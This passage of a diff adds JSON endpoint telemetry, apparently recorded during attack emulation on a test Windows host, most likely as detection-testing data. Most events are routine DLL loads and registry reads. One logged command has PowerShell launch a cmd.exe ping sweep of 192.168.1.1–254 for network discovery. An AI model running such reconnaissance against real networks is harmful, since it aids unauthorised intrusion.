"nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956360000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956360000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956360000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\IdentityCRL", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\IdentityCRL\\ClockData", + "registry_value": "ClockData", + "timestamp": 131883571967310016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883571967310016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883571967310016, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883571968400000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883571968400000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_value": "DiagTrack", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulUploadTime", + "registry_value": "LastSuccessfulUploadTime", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_value": "DiagTrack", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulNormalUploadTime", + "registry_value": "LastSuccessfulNormalUploadTime", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "destination_address": "52.114.128.8", + "destination_port": "443", + "event_type": "network", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + 
"source_address": "192.168.162.134", + "source_port": "50504", + "subtype": "outgoing", + "timestamp": 131883571967820000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "process", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "terminate", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "process", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3276, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883572002260000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": 
"{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002300000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "process", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883572002300000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7328, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883572002880000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.1", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6948, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572003000000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + 
"user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + 
"pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": 
"{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003240000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003240000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "process", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572003550000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "file", + "file_name": "PING.EXE-B29F6629.pf", + "file_path": "C:\\Windows\\Prefetch\\PING.EXE-B29F6629.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883572003550000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.2", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3500, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572003750000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}", + 
"unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3500, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003700016, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010CA705101}" + }, + { + "event_type": "image_load", + "image_name": 